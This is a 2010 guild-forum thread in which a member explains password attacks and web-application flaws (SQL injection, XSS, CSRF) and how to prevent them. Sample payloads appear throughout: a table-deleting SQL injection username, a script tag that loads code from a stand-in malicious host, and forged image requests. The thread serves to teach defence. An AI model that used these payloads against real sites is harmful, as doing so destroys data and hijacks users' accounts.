Black Raven Dragoons

Zancarius · by **Zancarius** » Fri May 28, 2010 3:38 pm

I want to clarify a little bit about how web site security works, and so I'm going to post a little bit related to my own experiences and some industry knowledge that might be interesting to some of you. I think it's important to be educated, and to ensure that you know precisely how certain things work. So far, I've got two posts.

[header=3]Web Application Security: Passwords[/header]

Web application security isn't hard but it's surprisingly difficult to get right. I'm posting this to educate you on what's out there, if you're curious, and to give you some idea how exploits work. It is therefore my hope that you won't then fall prey to information that is incorrect or only half-correct and thus more dangerous to your sanity than your computer. This post will be a fairly lengthy read, a somewhat technical read, but I have attempted to put some effort into writing it such that it is easy to understand. Be aware that some of this article is based on original research; I currently work fairly extensively with web applications and have some knowledge related to how they work, their implementations, and vulnerabilities. If you just flat-out don't want to read any of this, you don't have to. I'm providing it exclusively for educational purposes.

This installment actually has nothing to do with web application security with the exception of passwords, but it's pertinent to our little corner of the web. As it stands there are currently only five methods that can be used to obtain passwords and at least one method is dependent upon other mechanisms for exploiting the host software (meaning that it's not magical--the attacker has to find a way to access privileged data first before the attack will be successful). These attacks are, in order of easiest to most difficult:

Phishing
Key loggers
Rainbow tables*
Timing attacks**
Brute force

* Requires access to the encrypted passwords and is dependent upon successful attacks targeting the host site.
** Generally difficult and time consuming enough to render it completely unlikely to be used in practice. Requires knowledge of statistics. Unfortunately, almost every application is vulnerable to this unless it is written by an individual familiar with the vulnerability. The plus side is that timing attacks cannot be used to harvest passwords, so why did I include it? Keep reading.

[header=3]The Password Attacks[/header]

Phishing

Phishing is among the most common and probably most successful method of harvesting passwords on the Internet. The general idea is to create a site that looks identical to a valid site likely to be visited by the target users. Examples include banks, credit card companies, online vendors, and even World of Warcraft. The most recent phishing attacks that have been most successful have been those that claim to offer exclusive access to in-game pets or mounts. Phishing sites will also require you to manually enter in your username and password. This attack also requires the least effort on behalf of the attackers; it is up to the users to voluntarily give up their account information.

Incidentally, I would guess this attack is the most difficult to quantify in part because users are liars. Users don't always intend to lie, and it's important to remember that human memory is fallible, which gives BOFH administrators the illusion that users lie. Specifically: Unless victims of phishing attacks are pressed for further details, they will not remember that they willingly gave up their account information, because their brain has already associated the activity of providing their username/password combination with a valid action. Valid actions aren't questioned, and I should think that this is part of the reason why a vast majority of people who probably were victims of phishing attacks never remember. It's not being dishonest--it's because our brains have more important things to do, and when we associate an action with a legitimate activity, it suddenly transfers from a questionable act to one that we're unlikely to remember.

This is also why there is so much speculation by those who have had their accounts cracked that there's obviously some dark and sinister deed occurring beneath the surface that Blizzard is a part of.

Key Loggers

Key loggers are somewhat more difficult for an attacker to pull off than phishing, because they require the attacker to actively install malicious software on the target users' computers. There's plenty of resources here that have been posted by others, so I'm not going to describe a great deal about key loggers and WoW, but for those who need a refresher, here you go: Key loggers are malicious software that can be installed by visiting a compromised site. The software then monitors everything you type (and sometimes all of your mouse movements), records these activities, and then submits them to a web site controlled by the attacker. In order for a key logger to be successful, it must be able to send collected data to another location. Consequently, key loggers are generally only viable for a few months until authorities shut down the sites that collect data from compromised machines.

Key loggers can be defeated by safe browsing habits. There's plenty of tips in our forums on how to browse safely, but I think some of it might need updating.

Rainbow Tables

Despite the fruity name, rainbow tables are a solution that can be fairly effective at "cracking" weak passwords. The only problem with rainbow tables, though, is that the attacker must have access to the encrypted passwords. Assuming the attacker does have access to the passwords (which is difficult in its own right), a rainbow table can be very effective.

Before I describe what a rainbow table is, it's important to understand how most passwords are stored in a database, like the one that powers this forum. Passwords are very rarely stored in plain text. It's a poor security practice, and I think it could even be argued that it's a somewhat borderline breach of privacy. Thus, most passwords are protected by a method called "hashing." (I'll loosely call the result an "encrypted" password, but unlike true encryption a hash can't be reversed with a key.) Hashing is simply a process that takes any input and generates output of uniform length that is, in an ideal situation, unique to that input. MD5 is a popular algorithm for hashing (it has its flaws, which I'll mention in a much later post), and looks something like this:

Code:
purple = bb7aedfa61007447dd6efaf9f37641e3
asdf = 912ec803b2ce49e4a541068d495ab570
OMG something is eating my face = 796df227b8fbb0244b436b4075d48347

The string I input into MD5 is on the left; the output hash from MD5 is on the right. Notice that each hash is of identical length (32 characters) and represented in hexadecimal (the digits 0-9 plus the letters a-f, so the number 10 becomes the letter "a" and 16 becomes "10"). Incidentally, the word "purple" and the home row key combination "asdf" are two of the most common passwords in use. No, I'm not kidding.
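If you'd like to reproduce hashes like these yourself, here's a minimal sketch using Python's standard `hashlib` module. The helper name `md5_hex` is mine and purely for illustration; it isn't taken from any forum software.

```python
import hashlib


def md5_hex(text: str) -> str:
    """Return the MD5 hash of `text` as 32 hexadecimal characters."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    for word in ["purple", "asdf", "OMG something is eating my face"]:
        digest = md5_hex(word)
        # Every digest is 32 hex characters, no matter how long the input is.
        print(f"{word} = {digest} ({len(digest)} characters)")
```

The same input always produces the same output, which is exactly the property the next attack leans on.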

A rainbow table makes use of the fact that, for example, the MD5 hash of "purple" is always going to be "bb7aedfa61007447dd6efaf9f37641e3". Therefore, a rainbow table is, in simplified terms, a massive list of passwords built from all 52 upper- and lowercase letters (plus 10 digits and possibly assorted symbols) in various combinations, each paired with its hash. (Real rainbow tables store compressed chains of hashes rather than every single pair, but the idea is the same.) It's feasible to find rainbow tables that cover passwords of 12 characters in length or more; however, for each additional character added to the target password, the size of the table grows exponentially. Rainbow tables are therefore a trade-off between speed and space, and it's not uncommon for them to be large enough to fill two DVDs or more.
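To put rough numbers on that growth, here's a quick back-of-the-envelope sketch. It assumes an alphabet of 62 characters (52 letters plus 10 digits, no symbols) and simply counts every possible password up to a given length. The function name is made up for the example.

```python
def candidate_count(alphabet_size: int, max_length: int) -> int:
    """Count every possible password from 1 to `max_length` characters."""
    return sum(alphabet_size ** length for length in range(1, max_length + 1))


if __name__ == "__main__":
    for max_length in (4, 6, 8, 10, 12):
        total = candidate_count(62, max_length)
        print(f"up to {max_length:2d} characters: {total:,} candidates")
```

Each extra character multiplies the number of candidates by roughly the size of the alphabet, which is why table sizes balloon so quickly.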

Using a rainbow table in an actual attack requires that the attacker have access to the hashed password, such as "bb7aedfa61007447dd6efaf9f37641e3" in our case. The attacker then scans through the list of hashes until he or she encounters the string "bb7aedfa61007447dd6efaf9f37641e3" which matches up with the word "purple." The attacker then has the clear text version of a usable password.
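The lookup step can be sketched in a few lines. Keep in mind this is a plain precomputed dictionary rather than a real rainbow table (those are built differently to save space), and the tiny word list is made up for the example.

```python
import hashlib
from typing import Optional


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_table(candidates: list[str]) -> dict[str, str]:
    """Precompute hash -> password for every candidate (done once, ahead of time)."""
    return {md5_hex(word): word for word in candidates}


def crack(stolen_hash: str, table: dict[str, str]) -> Optional[str]:
    """Look a stolen hash up in the table; None means it isn't in our list."""
    return table.get(stolen_hash)


if __name__ == "__main__":
    table = build_table(["asdf", "letmein", "purple", "qwerty"])
    stolen = md5_hex("purple")  # stands in for a hash taken from a database
    print(crack(stolen, table))  # finds "purple"
    print(crack(md5_hex("a much longer passphrase"), table))  # not in the list
```

All the expensive work happens when the table is built; the actual "crack" is a single lookup.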

There are several ways to mitigate the usefulness of rainbow tables, including a fairly simple tactic called "salt." Just as salting food adds flavor to it, salting a password increases what is known in the field as "entropy" (basically random noise) and makes the password much more difficult to guess. Salt isn't anything magic: It's generally just a string of random numbers, letters, and symbols that gets added to the password prior to the final hash generation. This makes the password somewhat more secure. To illustrate, let's assume that we're still using the password "purple" and that we're going to add a 10 character salt of "RN*7ZndhLa".

First, we'll hash the password purple and obtain the string "bb7aedfa61007447dd6efaf9f37641e3".

Next, we'll prepend the salt to our hashed password and obtain "RN*7ZndhLabb7aedfa61007447dd6efaf9f37641e3".

Finally, we'll run the combined string through MD5 again and wind up with this: 49eea5527a1e8ffe311b4322c7f46f88.

It doesn't look anything like our original hash of "bb7aedfa61007447dd6efaf9f37641e3" anymore, does it?
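The three steps above translate to code fairly directly. This sketch follows the scheme exactly as I described it (salt prepended to the MD5 of the password, then hashed again). The function names are mine, and `new_salt` assumes a salt made of letters and digits only, which is just one way to generate one.

```python
import hashlib
import secrets


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def salted_hash(password: str, salt: str) -> str:
    """Hash the password, prepend the salt, then hash the combined string."""
    inner = md5_hex(password)   # step 1: hash the password
    combined = salt + inner     # step 2: prepend the salt
    return md5_hex(combined)    # step 3: hash the result again


def new_salt(length: int = 10) -> str:
    """Generate a random salt (assumption: letters and digits only)."""
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    print(salted_hash("purple", "RN*7ZndhLa"))
    # The same password with a different salt gives an unrelated hash.
    print(salted_hash("purple", new_salt()))
```

Since the salt has to be stored alongside the hash so the server can repeat the calculation at login, it only protects against precomputed tables, not against someone who has both pieces and plenty of time.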

One might wonder if it would then be possible for an attacker to generate rainbow tables containing 42 characters. Yes, it is possible, but the tables would probably consume the better part of an 80 gig hard drive and take months to generate.

The important thing to remember about MD5 is that it's an old algorithm and modern processors can generate billions of MD5 hashes in less than a day's worth of use. This implies that rainbow tables can be generated more or less on the fly when needed, so using MD5 to hash a password is really poor practice. The unfortunate thing is that every major message board uses MD5.

The reality of it is pretty much this: If someone can access the password hash, they can very probably find a fancy password (and its salt) in an extremely short period of time. I know I implied--and outright suggested--otherwise, but MD5, SHA1, and other hashes aren't really the best way to store passwords anymore.

Timing Attacks

Let me start with the bad news: Nearly every web application (yes, including phpBB) is susceptible to timing attacks. The good news, though, is that timing attacks are one of the easiest classifications of attacks to defeat and one of the most difficult attacks to pull off within a short period of time. If you want to read a post that explains how to defeat them in code along with what they are go here. My summary here is based on Coda Hale's post.

Timing attacks are based on a little known but highly useful trait of comparisons in code where inequality results in an immediate jump from the statement performing the comparison to the next block of code (or the containing block). Unfortunately for the attacker, attempting to use timing-based attacks to guess passwords is ineffective at best and is no different from using a brute-force attack. Unfortunately for the user, timing-based attacks are ideal for something known as "session hijacking."

Session hijacking involves exploiting the way a web application recognizes someone who's logged in. Whenever you log in (such as now while you're reading this), the web application stores a unique key to identify your session. This key is unique to you and you alone and is usually regenerated whenever you log out. More advanced web applications will often regenerate keys regularly to limit the window of opportunity during which a session hijacking attempt can be made.

It's not obvious at first why session hijacking is bad until you consider this: If an attacker can gain access to the session key, he can then masquerade as you, gaining access to everything in your account. He could obtain your e-mail address, change your password, make posts as you, and generally cause a great deal of havoc and embarrassment. The plus side is that session hijacking is fairly difficult in practice, but it's also the subject of this section.

Here's how a timing-based attack works:

First, let's assume that the server assigned us the session key "7888d65a43501d992cc38638b59964d6". When we log in, the server reads the session key (typically from a cookie) and then compares it with known session keys in the session table. Assuming it has found our exact key, it will perform a comparison one character at a time, which would look something like this:

Code:
if '7' == '7':
    if '8' == '8':
        if '8' == '8':

And so on until it encounters the last character. However, if we supplied only a partially correct session identifier of "79af87723dc295f95bdb277a61189a2a", the comparison would look like this:

Code:
if '7' == '7': // This passes
    if '8' == '9': // This doesn't, bail out.

And therein lies the problem. Inequality forces the comparison operator to bail out the exact instant an inequality is detected. This means that incorrect session identifiers return an invalid response sooner than slightly more valid session identifiers. By using statistics, the attacker can then determine that certain responses are statistically taking a longer period of time to return than others and are therefore more correct. After a period of weeks or months, the attacker can then obtain the session key in its entirety and log in as you.

However, there's some good news: This attack usually won't work in practice, and it certainly won't work for passwords. First, most web applications regenerate the session key periodically; regenerating the key would therefore force the attacker to throw out all of his work up to that point in time and start over. Second, by closing your browser, your session key is usually invalidated which also narrows the window of opportunity for this attack. The downside is that selecting "remember my password" usually stores a pre-logged in session or even your password in a cookie, which then remains unchanged indefinitely and opens us up to timing-based attacks all over again. Timing-based attacks are easily defeated, however, and are thus not a subject of concern.
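To make the difference concrete, here's a sketch of the character-by-character comparison described above next to a constant-time alternative. `naive_equals` is a hypothetical stand-in for what a typical string comparison does internally; `hmac.compare_digest` is the real Python standard-library function intended for this job.

```python
import hmac


def naive_equals(supplied: str, actual: str) -> bool:
    """Compare one character at a time and bail out at the first mismatch."""
    if len(supplied) != len(actual):
        return False
    for a, b in zip(supplied, actual):
        if a != b:
            return False  # early exit: how soon we get here leaks information
    return True


def constant_time_equals(supplied: str, actual: str) -> bool:
    """Compare without stopping early at the first mismatched character."""
    return hmac.compare_digest(supplied.encode("utf-8"), actual.encode("utf-8"))


if __name__ == "__main__":
    real_key = "7888d65a43501d992cc38638b59964d6"
    guess = "79af87723dc295f95bdb277a61189a2a"
    print(naive_equals(guess, real_key), constant_time_equals(guess, real_key))
    print(naive_equals(real_key, real_key), constant_time_equals(real_key, real_key))
```

Both functions give the same answers; the only difference is that the second one doesn't finish faster for a "more wrong" guess, so there's nothing for the attacker's statistics to latch onto.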

A similar method to timing-based attacks is the brute force attack. This operates directly on passwords. Keep reading.

Brute-force Attacks

I'll keep this short because brute-force attacks on user passwords are exceedingly simple but they're also exceedingly time consuming. Essentially, a brute-force attack requires knowledge of the user's username and nothing else.

Brute force attacks are called such because they require an attacker to guess passwords by submitting, one character at a time, new passwords in the hopes of guessing a user's password. This would start with something to the effect of submitting the letter "a" then the letter "b" and so on until the attacker reaches "z". Then, the attacker tries "aa", "ab", and so on until encountering "az." Repeat this until the attacker reaches the word "purple," and upon a successful login, the attacker then knows the user's password.
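Here's a small sketch of that guessing order, run entirely offline against a known target so you can see how quickly the count climbs. It assumes lowercase letters only, and the function names are made up for the example.

```python
import string
from itertools import islice, product
from typing import Iterator


def candidates(alphabet: str, max_length: int) -> Iterator[str]:
    """Yield every string over `alphabet`, shortest first: a, b, ..., z, aa, ab, ..."""
    for length in range(1, max_length + 1):
        for letters in product(alphabet, repeat=length):
            yield "".join(letters)


def guesses_needed(target: str, alphabet: str = string.ascii_lowercase) -> int:
    """Count how many guesses it takes to reach `target` in that order."""
    for count, guess in enumerate(candidates(alphabet, len(target)), start=1):
        if guess == target:
            return count
    raise ValueError("target uses characters outside the alphabet")


if __name__ == "__main__":
    # The first 28 guesses: a through z, then aa and ab.
    print(list(islice(candidates(string.ascii_lowercase, 2), 28)))
    print(guesses_needed("cat"))
```

I used a three-letter word here on purpose. Reaching a six-letter word like "purple" this way takes well over a hundred million guesses even with lowercase letters alone, and each guess against a real site is a full round trip to the server.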

Brute-force attacks are ridiculously easy to defeat. 1) Use lengthy passwords. A password over 8 characters is generally long enough to render brute-force attacks almost impossible to accomplish in less than a few weeks or months. 2) Limit users to a specific number of failed attempts per hour or day. Locking an account after 5 incorrect guesses essentially eliminates brute-force attacks. 3) A slightly less draconian approach to #2 is to "throttle" or "slow down" the server response after a certain number of failed login attempts. This achieves roughly the same result with far less inconvenience to the user.
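The lockout idea in #2 might look something like the sketch below. The limit of 5 failures comes from the text; the one-hour window, the in-memory storage, and the class name are all assumptions I picked for the example, and a real application would keep this in its database.

```python
import time
from collections import defaultdict
from typing import Optional

MAX_FAILURES = 5          # failed attempts allowed per window
WINDOW_SECONDS = 60 * 60  # one hour (an assumption for this sketch)


class LoginLimiter:
    """Track recent failed logins per username and refuse once the limit is hit."""

    def __init__(self) -> None:
        self._failures = defaultdict(list)  # username -> list of failure times

    def _recent(self, username: str, now: float) -> list:
        # Keep only the failures that are still inside the window.
        recent = [t for t in self._failures[username] if now - t < WINDOW_SECONDS]
        self._failures[username] = recent
        return recent

    def is_locked(self, username: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        return len(self._recent(username, now)) >= MAX_FAILURES

    def record_failure(self, username: str, now: Optional[float] = None) -> None:
        now = time.time() if now is None else now
        self._failures[username].append(now)


if __name__ == "__main__":
    limiter = LoginLimiter()
    for _ in range(5):
        limiter.record_failure("jane")
    print(limiter.is_locked("jane"))  # locked after 5 failures
    print(limiter.is_locked("bill"))  # untouched account
```

Throttling (#3) would use the same bookkeeping but delay the response instead of refusing it outright.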

[header=3]Passwords are Tough[/header]

That guessing passwords is a difficult endeavor is part of the reason why phishing and key logging are two of the most successful and wide-spread attacks. In fact, these two types of attacks are so successful, I sincerely doubt we'll ever have to worry about the other three methods of obtaining passwords! Basically, it all boils down to a single uncomfortable truth: Account security rests on the user. It doesn't rest on an administrator or a secured system somewhere across the country. If you enter your account details exactly once into a questionable site, you're going to be burned.

In the next post, I'll discuss in detail web application vulnerabilities in the wild. You'll then know enough to understand how web sites are compromised, cracked, and attacked.

Zancarius · by **Zancarius** » Fri May 28, 2010 3:49 pm

[header=3]Web Site Security[/header]

As I mentioned in the previous post, web site security isn't hard but it's surprisingly difficult to get right. Since attackers are more likely to use phishing attacks or key loggers to gain access to your account, there isn't much magic required to guess your password since you're the one providing it! Everything else I mentioned--rainbow tables, timing-based attacks, and brute force--is simply unheard of in the wild.

In other words: 3/5ths of what I wrote above you'll never ever ever ever ever encounter. Ever.

The problem, though, is that the remaining 2/5ths are the most common, most prevalent, and far more likely to be the source of a compromised account than the other 3/5ths. With the popularity of WoW, attackers will stop at nothing to coerce you into visiting phishing sites or installing trojans/backdoors/key loggers on your system to snag your account details. I also have some bad news. I'll post it in bold so you can worry about it:

**All web sites are potentially vulnerable, not just a humble message board. Every site you visit could be infected, and it is important to browse the web as if this is the case.**

Obviously, trusted sites are less likely to serve up malicious software to your computer, and large sites like YouTube, Google, and so on are far less likely to be compromised simply by virtue of the dozens of security measures they typically implement. Smaller sites are generally much more vulnerable, either because they don't have the additional security measures in place to limit the extent of attacks or because their administrators just don't understand the vulnerabilities. Most important, however, is the fact that a site doesn't even have to be compromised to do something malicious.

There is a bit of silver lining, however: These attacks aren't generally common, they're easily mitigated, and you really don't need to worry about them at all, because your account is far more likely to be compromised by you willingly giving out your own details to a malicious site. That's not to say you don't need to worry about getting a virus of sorts, but it's a point worth considering.

First, most web application vulnerabilities (from most common to least common) fall into three categories:

SQL injection attacks
Cross-site scripting vulnerabilities (XSS)
Cross-site request forgery (CSRF)

There's a few ironic things about this list, too. First, it's ordered in terms of most difficult to least difficult to fix (SQL injections generally being the most subtle and difficult to fix vulnerabilities simply by merit of the fact that they tend to exist in flocks rather than one or two at a time--a bad programmer will continue using bad practices through the life of an application unless educated, so an entire app can be affected). Second, while this list is ordered in terms of the most common attacks in the wild, it isn't well understood outside web security that SQL injection vulnerabilities are actually far less common in terms of possible vulnerabilities than CSRF attacks. The difference is that CSRF attacks aren't often exploited because they typically don't have the side effects an attacker wants.

[header=3]SQL Injection Attacks[/header]

SQL injection attacks are the most wide-spread, actively exploited vulnerability online and the one that a vast majority of web applications are affected by. SQL injection attacks are also the subject of this XKCD comic. I won't explain what SQL is; in short, it's a language that's used to obtain data from a database, but you can look it up on Wikipedia if you're painfully curious.

Essentially, an SQL injection exploits the fact that not all web applications are particularly careful when accepting user input. Let's assume that we've written the following authentication system in pseudocode that accepts a username without scrubbing it:

Code:
logged_in = false
username = request['username']  # taken from the request as-is, never scrubbed
userData = execute_query("SELECT * FROM users WHERE username LIKE '" + username + "';")
if userData['password'] == request['password']:
    logged_in = true

What this does is obtain the username provided by the user via the request. The request is not checked for validity--anything the user enters will now be contained in the variable "username." Next, we execute an SQL statement by injecting the username into the statement. Ideally, this will work as expected until the user enters in something containing an apostrophe ('), which is a special character used to delimit text fields in SQL. Let's see what the SQL statement would look like with the rather ordinary name of "jane" as a username:

Code:
SELECT * FROM users WHERE username LIKE 'jane';

This query is innocuous and does exactly as expected. It queries the "users" table for the username "jane" and returns all matches. However, if a malicious user has signed up with the name "Bill'sAccount", he might notice that an odd error is generated whenever he logs in. The reason is simple: With the name "Bill'sAccount," the query then becomes the following:

Code:
SELECT * FROM users WHERE username LIKE 'Bill'sAccount';

When the database receives this query, it sees the string as 'Bill' followed by something it doesn't know how to process: sAccount'

It then dies. Depending on how it dies, Bill might then become suspicious that an SQL injection is possible. He could then wipe the entire user table by attempting to login with the username: ';DELETE FROM users;--

When processed, the query plus the username "';DELETE FROM users;--" then becomes:

Code:
SELECT * FROM users WHERE username LIKE '';DELETE FROM users;--';

(Everything after -- becomes a comment, so the trailing "';" is ignored.)

This then creates two valid queries--an empty SELECT statement and a DELETE statement that wipes the entire "users" table.

Ironically, SQL injection is more often used to conduct the following type of attack (cross-site scripting) than it is used to deface sites or delete users. This is because a single SQL injection can insert any kind of code the attacker wants into any part of the site.

Also ironically, SQL injections are fairly easy to fix. Most SQL database drivers provide a method of querying the database called "prepared statements" which are far more secure, faster, and can be reused. The PHP MySQL query statements (newer versions) also provide some basic protections by only allowing each call to execute one statement at a time. Thus, if using PHP and MySQL, the above query would simply execute the empty SELECT statement. (Mind you, leaving the SQL injection in place is still asking for trouble and could cause far more problems, particularly if the behavior of the MySQL bindings changes.)
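Here's roughly what the prepared-statement approach looks like. I'm using Python's built-in `sqlite3` module with an in-memory database so the example is self-contained; the table layout and the `find_user` helper are assumptions for illustration, and the placeholder syntax differs between database drivers.

```python
import sqlite3


def find_user(conn: sqlite3.Connection, username: str):
    """Look up a user with a parameterized query instead of string concatenation."""
    # The "?" placeholder keeps the username as data; it is never parsed as SQL.
    cursor = conn.execute(
        "SELECT username, password FROM users WHERE username = ?",
        (username,),
    )
    return cursor.fetchone()


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("jane", "not-a-real-hash"))

    print(find_user(conn, "jane"))
    print(find_user(conn, "Bill'sAccount"))           # no error, just no match
    print(find_user(conn, "';DELETE FROM users;--"))  # treated as an odd username
    print(conn.execute("SELECT COUNT(*) FROM users").fetchone()[0])  # table intact
```

The apostrophe never gets a chance to end the string, because the query text and the user's input travel to the database separately.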

[header=3]Cross-site Scripting Vulnerabilities (XSS)[/header]

Cross-site scripting vulnerabilities are one of the most common classifications of attacks on the web, second only to SQL injection. They're also somewhat more sinister because they tend to be difficult to detect. While XSS attacks are almost always paired with SQL injection--the injection is used to inject the XSS code--this doesn't have to be the case. Any site that fails to validate or clean input provided by users can be susceptible to XSS vulnerabilities.

There are also several subclassifications of XSS attacks. I won't cover them all here, but I will cover the most common case that can be paired with either SQL injection or via a message board that doesn't properly clean input. It's as simple as something like this:

Code:
<script src="http://some.malicious.site/evil-script.js" type="text/javascript"></script>

Whether the code snippet above is injected by an SQL injection or by someone posting a message that didn't get cleaned is unimportant. What happens to visitors, however, is. Assuming someone visits the site with a vulnerable browser, the "evil-script.js" file is then loaded from the remote site (hence being a cross-site scripting vulnerability), executed, and does pretty much whatever it wants.
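On the message board side, "cleaning" input mostly means escaping it before it goes back out to other visitors. Here's a minimal sketch using Python's standard `html.escape`; the `render_post` function and the surrounding markup are hypothetical, and escaping on output is only one layer of defense.

```python
import html


def render_post(body: str) -> str:
    """Escape user-supplied text before placing it inside a page."""
    # html.escape turns <, >, &, and quotes into harmless entities.
    return '<div class="post">' + html.escape(body) + "</div>"


if __name__ == "__main__":
    malicious = (
        '<script src="http://some.malicious.site/evil-script.js" '
        'type="text/javascript"></script>'
    )
    print(render_post(malicious))
```

The visitor's browser then shows the script tag as literal text instead of fetching and running the remote file.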

As I alluded to earlier, there are at least a dozen different methods of using XSS to actively attack visitors' computers. One of the more recent ones that was used to compromise individuals running MSIE6 was clever but certainly not new. The attacker simply created a file containing valid HTML, an evil script to exploit a vulnerability in IE6, and then--wait for it--did something absolutely evil...

He then renamed it as an image. Whahuh?!

That's right, by creating an HTML document containing exploit code and naming it as "evil-image.png," MSIE6 did something absolutely stupid on levels that are surprising even for MS: Rather than rejecting the image as an invalid PNG, MSIE6 will happily process HTML documents that masquerade as image files. Thus, all he had to do to exploit every single MSIE6 user was to do something like the following:

Code:
<img src="http://some.malicous.site/evil-image.png" width="1337" height="42" />

Visitors using browsers other than MSIE6 would then simply see a broken image link ("wow, that retard doesn't know how to link to pictures!") while MSIE6 users would get malicious code served up hot and fresh ("why is my computer so slow now?").

This latter attack also qualifies as an XSS attack. It's also much more difficult to eliminate completely, but thankfully the only people who use MSIE6 are either suicidal or government entities. Maybe both.

[header=3]Cross-site Request Forgery[/header]

Cross-site request forgery attacks, or CSRF for short, are a little more difficult to understand. Wikipedia defines them as an "attack that exploits the trust a site has in a user's browser." Sounds complicated, doesn't it? The thing is, it's not, and every single web application in existence, almost without fail, is susceptible to this form of attack. More importantly, CSRF attacks are the easiest attack to prevent and eliminate.

If you read the first post, you might remember me briefly mentioning sessions. CSRF attacks make use of the fact that once a user is logged in to a site, any requests to the site that their browser sends will be validated as authentic and, most importantly, as that user. CSRF is becoming much more common, too, since many sites now offer interactive services using a technology known as AJAX to send queries to the server and update the page without the user having to physically navigate between pages. If you've used Gmail or even Twitter, you've seen AJAX in action.

Now, let's assume that a message board grants users an option to delete their posts by clicking the delete button. If the user has JavaScript enabled in their browser, the browser will then send a request to delete that particular post, receive a response from the server, and if the deletion is successful, remove the post from the page using JavaScript--all without having to navigate to a confirmation page, click yes, and then return to the original thread.

Let's also assume that the request sent to the server from the user's browser is something like the URL: http://some.forum/posts?postid=35&action=delete

When the user clicks delete, JavaScript queries the URL and gathers a response. As I mentioned, if the response indicates success, the user's browser then removes their post from the page without them having to press refresh or navigate between pages.

Here's where the attacker can coerce the user's browser to delete their post without them even clicking on it. Let's say that the attacker knows the post he wants to delete has an ID number of 35. He also really hates the individual who made that particular post. He also has the tendency to post pictures everyone likes to visit. Thus, he could post in a separate thread (let's assume it's titled "PICTURES OF MEH CAT11111") and add the image:

Code:
<img src="http://some.forum/posts?postid=35&action=delete" width="480" height="480" />

Just to be sneaky, he sticks that picture in amongst a few others of actual cats.

As visitors view his thread, the request is sent to the "posts" page to delete post ID 35. Since the visitors thus far don't own the post, the server sends back a response indicating that they don't have the authorization to delete it. To these visitors, the post appears as a broken link. Perhaps someone else even notices it:

"Hey man, I see you posted 20 pictures but there's one that doesn't show up. Could you fix it?"

The thread grows a little as people view the cats until the moment our victim comes in to view it. As soon as he does, his browser starts loading the pictures including the one pointing to the URL http://some.forum/posts?postid=35&action=delete

Suddenly, the victim's post in the other thread disappears. He won't notice it at first, of course, because it might be a thread that he only checks once in a while. Maybe the victim also posts a note in the cat thread:

"Nice cat pictures. I like the one sitting in the sink."

The attacker sees this and double-checks the other thread and notices that the victim's post is gone. He then goes back to his cat pictures, fixes the "broken" link by replacing it with an actual picture, and then no one is any the wiser.

Some days later, the victim comes back and might notice his post is gone.

"Hey, weird. I didn't delete my post about how much I hate dogs. Did the forum eat it?"

The attacker then laughs his ass off, because he knows the attack was successful. The administrator might point out that the forum doesn't just "eat" posts and that he had to physically delete it himself. Maybe the victim makes another post. Maybe the attacker repeats the trick ad nauseam. Maybe the victim doesn't even notice to begin with.

The upshot is that CSRF is a sinister method of attacking, because it's the victim's browser that does the dirty work for the attacker. Just imagine what'd happen if this were a banking site that allowed transactions between users.

Fortunately, CSRF is really easy to fix by validating user requests. If a user has physically requested a form, the server can validate that, indeed, the user has made a real request sometime in the last 15 minutes and allow the deletion (or transaction) to complete. However, the best solution by far is to use a random "token" generated by the server and sent along with the request. That way, if the token is something like "15689671981234", and the victim encounters the deletion link that the attacker crafted (the attacker won't know the random token), the deletion fails and the CSRF attack is foiled.
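The token approach can be sketched like this. The plain dictionary stands in for whatever server-side session storage the application uses, and the function names and the `csrf_token` key are my own choices for the example, not any particular framework's API.

```python
import hmac
import secrets


def issue_token(session: dict) -> str:
    """Generate a random token, remember it in the session, and return it for the form."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def is_valid_request(session: dict, submitted_token: str) -> bool:
    """Accept the request only if it carries the token we issued for this session."""
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    # Constant-time comparison, so the check itself doesn't leak the token.
    return hmac.compare_digest(expected.encode("utf-8"), submitted_token.encode("utf-8"))


if __name__ == "__main__":
    session = {}  # stands in for the server-side session store
    token = issue_token(session)
    print(is_valid_request(session, token))  # genuine delete button
    print(is_valid_request(session, ""))     # forged <img> request carries no token
```

The real delete button includes the token because the server put it in the page; the attacker's image link can't, because he never sees the victim's page.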

Note: phpBB doesn't allow messages to be deleted in this manner. Because the version we're running is so old, it's not susceptible to CSRF attacks.

[header=3]It's important...[/header]

It's important to note that SQL injection attacks, XSS, and CSRF vulnerabilities are almost never used individually and are almost always used in tandem with another form of attack. Recently, a bug tracking site hosted for the Apache Software Foundation by Atlassian was exploited with a combined CSRF and XSS attack that compromised several accounts which the attacker then used to make modifications to some software on the host. The upshot, though, is that the individuals whose accounts were compromised made an effort to click on a questionable link--while they were logged in. This then exploited their credentials to make changes to their accounts. So, in short, most vulnerabilities tend to travel in packs and exceptionally dangerous ones tend to require some form of user interaction.

For the one or two readers still with me at this point, I hope you've gotten some exposure to how exploits work in the world of web applications. It's a lot more complicated than just a "script kiddie" with access to a mouse. It's also a world where the only person who's going to look out for you is you.
